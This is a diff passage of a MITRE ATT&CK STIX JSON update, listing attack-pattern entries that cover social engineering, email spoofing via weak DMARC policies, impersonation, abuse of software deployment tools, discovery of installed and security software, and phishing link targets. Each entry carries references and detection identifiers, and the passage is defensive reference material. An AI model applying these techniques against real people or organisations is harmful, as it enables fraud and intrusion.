+                    "type": "attack-pattern",
+                    "id": "attack-pattern--41e4d77a-6275-4976-9e35-785985598519",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-14 22:53:26.607000+00:00",
+                    "modified": "2026-05-12 15:12:00.629000+00:00",
+                    "name": "Social Engineering",
+                    "description": "Adversaries may use social engineering techniques to influence users to take actions that result in unauthorized access, approval of changes, disclosure of sensitive information, or execution of adversary-supplied instructions (i.e., introduction of malicious payloads or software), while minimizing technical indicators. \n\nAdversaries may leverage trust-building methods across multiple channels (e.g., executive, vendor, or help desk scenarios, including AI-enabled voice interactions) to prompt user-authorized actions such as password resets, MFA changes, financial approvals, or the disclosure of sensitive information. Adversaries may also leverage common business communications and workflows such as email, collaboration platforms, voice communications, recruiting processes, help desk interactions, and SaaS consent mechanisms to make malicious requests appear routine and legitimate.(Citation: Proofpoint TA427 April 2024)(Citation: SE SentinelOne 2)(Citation: SE - Hackers Target Workday)\n\nAdditionally, adversaries have persuaded victims to take actions through references of current events, harnessing relevant themes to the work role or the organizations mission. For example, adversaries may use scare tactics (i.e., threaten repercussions for non-compliance) or otherwise incite victims\u2019 emotions in order to generate a sense of urgency to take action.(Citation: SE Proofpoint)(Citation: SE SentinelOne)\n\nThis technique may include common social engineering patterns such as [Phishing](https://attack.mitre.org/techniques/T1566) and [Spearphishing Voice](https://attack.mitre.org/techniques/T1566/004), often supported by convincing and targeted narratives.(Citation: SE SentinelOne 2)(Citation: Fortinet Trends 25-26)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1684",
+                            "external_id": "T1684"
+                        },
+                        {
+                            "source_name": "SE - Hackers Target Workday",
+                            "description": "David Jones. (2025, August 19). Hackers target Workday in social engineering attack. Retrieved April 15, 2026.",
+                            "url": "https://www.cybersecuritydive.com/news/hackers-target-workday-in-social-engineering-attack/758095/#:~:text=Researchers%20cite%20increasing%20evidence%20of,told%20Cybersecurity%20Dive%20via%20email."
+                        },
+                        {
+                            "source_name": "Fortinet Trends 25-26",
+                            "description": "Fortinet. (n.d.). Recent Cyber Attacks & Emerging Cybersecurity Trends. Retrieved April 15, 2026.",
+                            "url": "https://www.fortinet.com/uk/resources/cyberglossary/recent-cyber-attacks"
+                        },
+                        {
+                            "source_name": "Proofpoint TA427 April 2024",
+                            "description": "Lesnewich, G. et al. (2024, April 16). From Social Engineering to DMARC Abuse: TA427\u2019s Art of Information Gathering. Retrieved May 3, 2024.",
+                            "url": "https://www.proofpoint.com/us/blog/threat-insight/social-engineering-dmarc-abuse-ta427s-art-information-gathering"
+                        },
+                        {
+                            "source_name": "SE Proofpoint",
+                            "description": "Proofpoint. (n.d.). What Is Social Engineering?. Retrieved April 15, 2026.",
+                            "url": "https://www.proofpoint.com/us/threat-reference/social-engineering"
+                        },
+                        {
+                            "source_name": "SE SentinelOne",
+                            "description": "SentinelOne. (2023, October 19). Social Engineering Attacks | How to Recognize and Resist The Bait. Retrieved April 15, 2026.",
+                            "url": "https://www.sentinelone.com/blog/social-engineering-attacks-how-to-recognize-and-resist-the-bait/"
+                        },
+                        {
+                            "source_name": "SE SentinelOne 2",
+                            "description": "SentinelOne. (2025, August 19). 15 Types of Social Engineering Attacks. Retrieved April 15, 2026.",
+                            "url": "https://www.sentinelone.com/cybersecurity-101/threat-intelligence/types-of-social-engineering-attacks/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Office Suite",
+                        "SaaS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.629000+00:00\", \"old_value\": \"2026-04-15 15:39:55.218000+00:00\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1017: User Training",
+                            "M1036: Account Use Policies",
+                            "M1047: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0899: Detect Social Engineering"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--fcf5bccf-be7a-48ff-b7a7-8d6019279301",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-14 22:54:01.539000+00:00",
+                    "modified": "2026-05-12 15:12:00.726000+00:00",
+                    "name": "Email Spoofing",
+                    "description": "Adversaries may fake, or spoof, a sender\u2019s identity by modifying the value of relevant email headers in order to establish contact with victims under false pretenses.(Citation: Proofpoint TA427 April 2024)\u00a0In addition to actual email content, email headers (such as the FROM header, which contains the email address of the sender) may also be modified. Email clients display these headers when emails appear in a victim's inbox, which may cause modified emails to appear as if they were from the spoofed entity.\n\nEnterprise environments can use Domain-based Message Authentication, Reporting, and Conformance (DMARC) as an email authentication protocol that references results of the Sender Policy Framework (SPF) and DomainKeys Identified Mail (DKIM) configurations. SPF and DKIM are configured separately in DNS: SPF verifies that the sending server is authorized for the domain, while DKIM uses a digital signature to verify email integrity and domain authentication. Together, they validate email authenticity and specify how receiving servers should handle authentication failures. Without enforced identity authentication, adversaries may compromise the integrity of an authentication check with altered headers that would not have otherwise passed.(Citation: Cloudflare DMARC, DKIM, and SPF)(Citation: DMARC-overview)(Citation: Proofpoint-DMARC)\n\nAn example of a weak or absent DMARC policy is `v=DMARC1; p=none; fo=1;`. The `p=none`. The `p=none` indicates no action should be taken, and therefore no filtering action will take place, even if an email fails authentication checks (i.e., SPF and/or DKIM fail). When a DMARC policy indicates no action, the email will still be delivered to the victim\u2019s inbox.(Citation: ic3-dprk) \n\nAdversaries have abused weak or absent DMARC policies to circumvent authentication checks and conceal social engineering attempts. Adversaries can alter email headers to include legitimate domain names with fake usernames or impersonate legitimate users via [Impersonation](https://attack.mitre.org/techniques/T1684/001) for [Phishing](https://attack.mitre.org/techniques/T1566). Additionally, adversaries may abuse Microsoft 365\u2019s Direct Send functionality to spoof internal users by using internal devices like printers to send emails without authentication.(Citation: Barnea DirectSend)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1684/002",
+                            "external_id": "T1684.002"
+                        },
+                        {
+                            "source_name": "Cloudflare DMARC, DKIM, and SPF",
+                            "description": "Cloudflare. (n.d.). What are DMARC, DKIM, and SPF?. Retrieved April 8, 2025.",
+                            "url": "https://www.cloudflare.com/learning/email-security/dmarc-dkim-spf/"
+                        },
+                        {
+                            "source_name": "DMARC-overview",
+                            "description": "DMARC. (n.d.). Retrieved March 24, 2025.",
+                            "url": "https://dmarc.org/overview"
+                        },
+                        {
+                            "source_name": "ic3-dprk",
+                            "description": "FBI, State Department, NSA. (2024, May 2). North Korean Actors Exploit Weak DMARC Security Policies to Mask Spearphishing Efforts. Retrieved April 2, 2025.",
+                            "url": "https://www.ic3.gov/CSA/2024/240502.pdf"
+                        },
+                        {
+                            "source_name": "Proofpoint TA427 April 2024",
+                            "description": "Lesnewich, G. et al. (2024, April 16). From Social Engineering to DMARC Abuse: TA427\u2019s Art of Information Gathering. Retrieved May 3, 2024.",
+                            "url": "https://www.proofpoint.com/us/blog/threat-insight/social-engineering-dmarc-abuse-ta427s-art-information-gathering"
+                        },
+                        {
+                            "source_name": "Proofpoint-DMARC",
+                            "description": "Proofpoint. (n.d.). Retrieved March 24, 2025.",
+                            "url": "https://www.proofpoint.com/us/threat-reference/dmarc"
+                        },
+                        {
+                            "source_name": "Barnea DirectSend",
+                            "description": "Tom Barnea. (2025, September 9). Ongoing Campaign Abuses Microsoft 365\u2019s Direct Send to Deliver Phishing Emails. Retrieved September 24, 2025.",
+                            "url": "https://www.varonis.com/blog/direct-send-exploit"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Office Suite",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.726000+00:00\", \"old_value\": \"2026-04-22 15:49:23.425000+00:00\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1054: Software Configuration"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0431: Detection Strategy for Email Spoofing"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--cd92d2b8-ce43-4666-9472-f1b4b9f4f8be",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-14 22:54:01.082000+00:00",
+                    "modified": "2026-05-12 15:12:00.717000+00:00",
+                    "name": "Impersonation",
+                    "description": "Adversaries may impersonate a trusted person or organization in order to persuade and trick a target into performing some action on their behalf. For example, adversaries may communicate with victims (via [Phishing for Information](https://attack.mitre.org/techniques/T1598), [Phishing](https://attack.mitre.org/techniques/T1566), or [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)) while impersonating a known sender such as an executive, colleague, or third-party vendor. Established trust can then be leveraged to accomplish an adversary\u2019s ultimate goals, possibly against multiple victims.\n\nIn many cases of business email compromise or email fraud campaigns, adversaries use impersonation to defraud victims -- deceiving them into sending money or divulging information that ultimately enables [Financial Theft](https://attack.mitre.org/techniques/T1657).\n\nAdversaries will often also use social engineering techniques such as manipulative and persuasive language in email subject lines and body text such as `payment`, `request`, or `urgent` to push the victim to act quickly before malicious activity is detected. These campaigns are often specifically targeted against people who, due to job roles and/or accesses, can carry out the adversary\u2019s goal.\u202f\u202f\n\nImpersonation is typically preceded by reconnaissance techniques such as [Gather Victim Identity Information](https://attack.mitre.org/techniques/T1589) and [Gather Victim Org Information](https://attack.mitre.org/techniques/T1591) as well as acquiring infrastructure such as email domains (i.e. [Domains](https://attack.mitre.org/techniques/T1583/001)) to substantiate their false identity.(Citation: Crowdstrike BEC)\n\nThere is the potential for multiple victims in campaigns involving impersonation. For example, an adversary may Compromise Accounts targeting one organization which can then be used to support impersonation against other entities.(Citation: VEC)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1684/001",
+                            "external_id": "T1684.001"
+                        },
+                        {
+                            "source_name": "Crowdstrike BEC",
+                            "description": "Bart Lenaerts-Bergmans. (2023, August 8). What is Business Email Compromise?. Retrieved April 15, 2026.",
+                            "url": "https://www.crowdstrike.com/en-us/cybersecurity-101/threat-intelligence/business-email-compromise-bec/"
+                        },
+                        {
+                            "source_name": "VEC",
+                            "description": "CloudFlare. (n.d.). What is vendor email compromise (VEC)?. Retrieved September 12, 2023.",
+                            "url": "https://www.cloudflare.com/learning/email-security/what-is-vendor-email-compromise/#:~:text=Vendor%20email%20compromise%2C%20also%20referred,steal%20from%20that%20vendor%27s%20customers."
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Blake Strom, Microsoft Threat Intelligence",
+                        "Pawel Partyka, Microsoft Threat Intelligence"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Office Suite",
+                        "SaaS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.717000+00:00\", \"old_value\": \"2026-04-22 15:50:04.400000+00:00\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1017: User Training",
+                            "M1019: Threat Intelligence Program"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0286: Detection Strategy for Impersonation"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--92a78814-b191-47ca-909c-1ccfe3777414",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:30:57.201000+00:00",
+                    "modified": "2026-05-12 15:12:00.705000+00:00",
+                    "name": "Software Deployment Tools",
+                    "description": "Adversaries may gain access to and use centralized software suites installed within an enterprise to execute commands and move laterally through the network. Configuration management and software deployment applications may be used in an enterprise network or cloud environment for routine administration purposes. These systems may also be integrated into CI/CD pipelines. Examples of such solutions include: SCCM, HBSS, Altiris, AWS Systems Manager, Microsoft Intune, Azure Arc, and GCP Deployment Manager.  \n\nAccess to network-wide or enterprise-wide endpoint management software may enable an adversary to achieve remote code execution on all connected systems. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.\n\nSaaS-based configuration management services may allow for broad [Cloud Administration Command](https://attack.mitre.org/techniques/T1651) on cloud-hosted instances, as well as the execution of arbitrary commands on on-premises endpoints. For example, Microsoft Configuration Manager allows Global or Intune Administrators to run scripts as SYSTEM on on-premises devices joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001) to communicate back to adversary owned infrastructure.(Citation: Mitiga Security Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices may also have configuration management tools that can be similarly abused by adversaries.(Citation: Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation)\n\nThe permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the third-party system, or specific domain credentials may be required. However, the system may require an administrative account to log in or to access specific functionality.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "execution"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "lateral-movement"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1072",
+                            "external_id": "T1072"
+                        },
+                        {
+                            "source_name": "Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation",
+                            "description": "ALEXANDER MARVI, BRAD SLAYBAUGH, DAN EBREO, TUFAIL AHMED, MUHAMMAD UMAIR, TINA JOHNSON. (2023, March 16). Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation. Retrieved May 15, 2023.",
+                            "url": "https://www.mandiant.com/resources/blog/fortinet-malware-ecosystem"
+                        },
+                        {
+                            "source_name": "SpecterOps Lateral Movement from Azure to On-Prem AD 2020",
+                            "description": "Andy Robbins. (2020, August 17). Death from Above: Lateral Movement from Azure to On-Prem AD. Retrieved March 13, 2023.",
+                            "url": "https://posts.specterops.io/death-from-above-lateral-movement-from-azure-to-on-prem-ad-d18cb3959d4d"
+                        },
+                        {
+                            "source_name": "Mitiga Security Advisory: SSM Agent as Remote Access Trojan",
+                            "description": "Ariel Szarf, Or Aspir. (n.d.). Mitiga Security Advisory: Abusing the SSM Agent as a Remote Access Trojan. Retrieved January 31, 2024.",
+                            "url": "https://www.mitiga.io/blog/mitiga-security-advisory-abusing-the-ssm-agent-as-a-remote-access-trojan"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Shane Tully, @securitygypsy",
+                        "Joe Gumke, U.S. Bank",
+                        "Tamir Yehuda"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "SaaS",
+                        "Windows"
+                    ],
+                    "x_mitre_remote_support": false,
+                    "x_mitre_version": "3.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.705000+00:00\", \"old_value\": \"2025-10-24 17:49:06.595000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "3.2",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1015: Active Directory Configuration",
+                            "M1017: User Training",
+                            "M1018: User Account Management",
+                            "M1026: Privileged Account Management",
+                            "M1027: Password Policies",
+                            "M1029: Remote Data Storage",
+                            "M1030: Network Segmentation",
+                            "M1032: Multi-factor Authentication",
+                            "M1033: Limit Software Installation",
+                            "M1051: Update Software"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0223: Detection of Adversary Abuse of Software Deployment Tools"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-09-16 17:52:44.147000+00:00",
+                    "modified": "2026-05-12 15:12:00.723000+00:00",
+                    "name": "Software Discovery",
+                    "description": "Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1518) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nSuch software may be deployed widely across the environment for configuration management or security reasons, such as [Software Deployment Tools](https://attack.mitre.org/techniques/T1072), and may allow adversaries broad access to infect devices or move laterally.\n\nAdversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "discovery"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1518",
+                            "external_id": "T1518"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "IaaS",
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.5",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.723000+00:00\", \"old_value\": \"2025-10-24 17:49:31.671000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.5",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0392: Multi-Platform Software Discovery Behavior Chain"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-21 21:16:18.066000+00:00",
+                    "modified": "2026-05-12 15:12:00.716000+00:00",
+                    "name": "Security Software Discovery",
+                    "description": "Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as cloud monitoring agents and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nExample commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), <code>reg query</code> with [Reg](https://attack.mitre.org/software/S0075), <code>dir</code> with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.\n\nAdversaries may also utilize the [Cloud API](https://attack.mitre.org/techniques/T1059/009) to discover cloud-native security software installed on compute infrastructure, such as the AWS CloudWatch agent, Azure VM Agent, and Google Cloud Monitor agent. These agents  may collect  metrics and logs from the VM, which may be centrally aggregated in a cloud-based monitoring platform.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "discovery"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1518/001",
+                            "external_id": "T1518.001"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Isif Ibrahima, Mandiant"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "IaaS",
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.5",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.716000+00:00\", \"old_value\": \"2025-10-24 17:49:23.401000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.5",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0016: Security Software Discovery Across Platforms"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--84ae8255-b4f4-4237-b5c5-e717405a9701",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-03-17 20:35:08.429000+00:00",
+                    "modified": "2026-05-12 15:12:00.683000+00:00",
+                    "name": "Link Target",
+                    "description": "Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003)) or a phish to gain initial access to a system (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)), an adversary must set up the resources for a link target for the spearphishing link. \n\nTypically, the resources for a link target will be an HTML page that may include some client-side script such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) to decide what content to serve to the user. Adversaries may clone legitimate sites to serve as the link target, this can include cloning of login pages of legitimate web services or organization login pages in an effort to harvest credentials during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003).(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) Adversaries may also [Upload Malware](https://attack.mitre.org/techniques/T1608/001) and have the link target point to malware for download/execution by the user.\n\nAdversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Malicious Link](https://attack.mitre.org/techniques/T1204/001).\n\nLinks can be written by adversaries to mask the true destination in order to deceive victims by abusing the URL schema and increasing the effectiveness of phishing.(Citation: Kaspersky-masking)(Citation: mandiant-masking)\n\nAdversaries may also use free or paid accounts on link shortening services and Platform-as-a-Service providers to host link targets while taking advantage of the widely trusted domains of those providers to avoid being blocked while redirecting victims to malicious pages.(Citation: Netskope GCP Redirection)(Citation: Netskope Cloud Phishing)(Citation: Intezer App Service Phishing)(Citation: Cofense-redirect) In addition, adversaries may serve a variety of malicious links through uniquely generated URIs/URLs (including one-time, single use links).(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique) Finally, adversaries may take advantage of the decentralized nature of the InterPlanetary File System (IPFS) to host link targets that are difficult to remove.(Citation: Talos IPFS 2022)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "resource-development"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1608/005",
+                            "external_id": "T1608.005"
+                        },
+                        {
+                            "source_name": "Netskope GCP Redirection",
+                            "description": "Ashwin Vamshi. (2019, January 24). Targeted Attacks Abusing Google Cloud Platform Open Redirection. Retrieved August 18, 2022.",
+                            "url": "https://www.netskope.com/blog/targeted-attacks-abusing-google-cloud-platform-open-redirection"
+                        },
+                        {
+                            "source_name": "Netskope Cloud Phishing",
+                            "description": "Ashwin Vamshi. (2020, August 12). A Big Catch: Cloud Phishing from Google App Engine and Azure App Service. Retrieved August 18, 2022.",
+                            "url": "https://www.netskope.com/blog/a-big-catch-cloud-phishing-from-google-app-engine-and-azure-app-service"
+                        },
+                        {
+                            "source_name": "URI Unique",
+                            "description": "Australian Cyber Security Centre. National Security Agency. (2020, April 21). Detect and Prevent Web Shell Malware. Retrieved February 9, 2024.",
+                            "url": "https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF"
+                        },
+                        {
+                            "source_name": "Kaspersky-masking",
+                            "description": "Dedenok, Roman. (2023, December 12). How cybercriminals disguise URLs. Retrieved January 17, 2024.",
+                            "url": "https://www.kaspersky.com/blog/malicious-redirect-methods/50045/"
+                        },
+                        {
+                            "source_name": "Talos IPFS 2022",
+                            "description": "Edmund Brumaghin. (2022, November 9). Threat Spotlight: Cyber Criminal Adoption of IPFS for Phishing, Malware Campaigns. Retrieved March 8, 2023.",
+                            "url": "https://blog.talosintelligence.com/ipfs-abuse/"
+                        },
+                        {
+                            "source_name": "Malwarebytes Silent Librarian October 2020",
+                            "description": "Malwarebytes Threat Intelligence Team. (2020, October 14). Silent Librarian APT right on schedule for 20/21 academic year. Retrieved February 3, 2021.",
+                            "url": "https://blog.malwarebytes.com/malwarebytes-news/2020/10/silent-librarian-apt-phishing-attack/"
+                        },
+                        {
+                            "source_name": "URI",
+                            "description": "Michael Cobb. (2007, October 11). Preparing for uniform resource identifier (URI) exploits. Retrieved February 9, 2024.",
+                            "url": "https://www.techtarget.com/searchsecurity/tip/Preparing-for-uniform-resource-identifier-URI-exploits"
+                        },
+                        {
+                            "source_name": "URI Use",
